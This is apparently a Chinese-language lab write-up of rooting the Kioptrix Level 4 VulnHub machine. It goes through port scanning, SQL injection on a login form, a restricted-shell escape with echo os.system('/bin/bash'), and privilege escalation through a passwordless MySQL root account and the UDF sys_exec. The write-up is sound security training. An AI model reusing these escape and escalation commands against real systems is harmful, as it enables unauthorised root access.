【writeup】Kioptrix Level 4靶机

前言

靶机环境：https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
kali攻击机IP：192.168.119.134
靶机IP：192.168.119.138

过程

nmap扫描

先用nmap扫描发现靶机的IP。获取了靶机的IP是192.168.119.138 。并用nmap进一步扫描，靶机开放了HTTP、ssh、smb服务。

root@ian:~# nmap -sn 192.168.119.0/24
...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 10:58 CST
Nmap scan report for 192.168.119.138
Host is up (0.00016s latency).
MAC Address: 00:0C:29:71:D6:25 (VMware)
...
Nmap scan report for 192.168.119.134
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.03 seconds

root@ian:~# nmap -sS -T4 -p- -A 192.168.119.138
......
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:D6:25 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h00m02s, deviation: 2h49m43s, median: 1s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2020-09-21T23:01:04-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
......

dirsearch网站目录扫描

靶机开放了80端口，所以先dirsearch扫描一下网站路径。有两个可访问的页面，checklogin.php和datebase.sql。datebase.sql文件是个数据库执行脚本，访问这个脚本，可以看到会执行创建members表，并创建了john账号，并且密码是1234.

不过这个账号和密码并不能在checklogin.PHP里登陆，提示账号密码错误。不确定是john未创建还是密码改了。

samba扫描

enum4linux和smbmap（这块暂时还不太熟练）

SQL注入

访问靶机的HTTP服务，网站只有一个登陆功能。（用sqlmap跑了下，没成功，但手工测试password字段是存在注入漏洞的）
尝试用万能密码登录，可以看到是存在注入的。

登陆成功后就会跳转到members.php页面。尝试admin、root，都是一样的提示。尝试前面获取的john用户，成功了。确定了john用户存在并且密码也获取到了。

Username 	: 	john
Password 	: 	MyNameIsJohn

SSH登录john账号

root@ian:/# ssh john@192.168.119.138
john@192.168.119.138's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ lpath
Allowed:/home/john

john账号的执行权限被限制了，仅可执行部分命令，并且可访问的目录页仅限制在了/home/john 。在可执行的命令中，利用echo调用os.system()函数指定/bin/bash。成功绕过受限shell环境。绕过之后sudo -l看了下，没有额外的权限。
外部参考连接：
绕过Linux受限shell环境的技巧
ex16x41

john:~$ echo os.system('/bin/bash')  

查找可利用的suid文件。ping命令网上有可以利用提权的方法，不过靶机限制了john用户使用gcc，无法编译payload文件。暂时没找到什么办法可以成功编译，跳过。

find / -perm -4000 2>/dev/null

利用MySQL UDF提权

最后还是查了下网上的办法，还是回到靶机开放的网站上面，从mysql入手提权。
从checklogin.php文件可以看到mysql的root用户是没有密码的。可以直接以root用户连接mysql，再利用mysql执行提权操作。

john@Kioptrix4:/var/www/john$ cat /var/www/checklogin.php                                                                                                                                   
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password  这里的root密码为空，判断root使用空密码。
$db_name="members"; // Database name
$tbl_name="members"; // Table name

尝试用root连接MySQL。查询UDF表，有sys_exec函数，可以利用这个函数执行系统命令。通过sys_exec函数将john添加到管理员组。

mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)mysql> select sys_exec('usermod -a -G admin john');                                                                                                                                        
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.04 sec)

john@Kioptrix4:/var/www/john$ sudo su
[sudo] password for john: 
root@Kioptrix4:/var/www/john# id
uid=0(root) gid=0(root) groups=0(root)root@Kioptrix4:/var/www/john# cat /root/congrats.txt 
Congratulations!
You've got root.There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.If you haven't already, check out the other VMs available on:
www.kioptrix.comThanks for playing,
loneferret

总结

1、整理Samba常用渗透技巧（包含enum4linux和smbmap）
2、整理MySQL UDF提权技巧
3、梳理常见的提权技巧
(整理后再附上链接)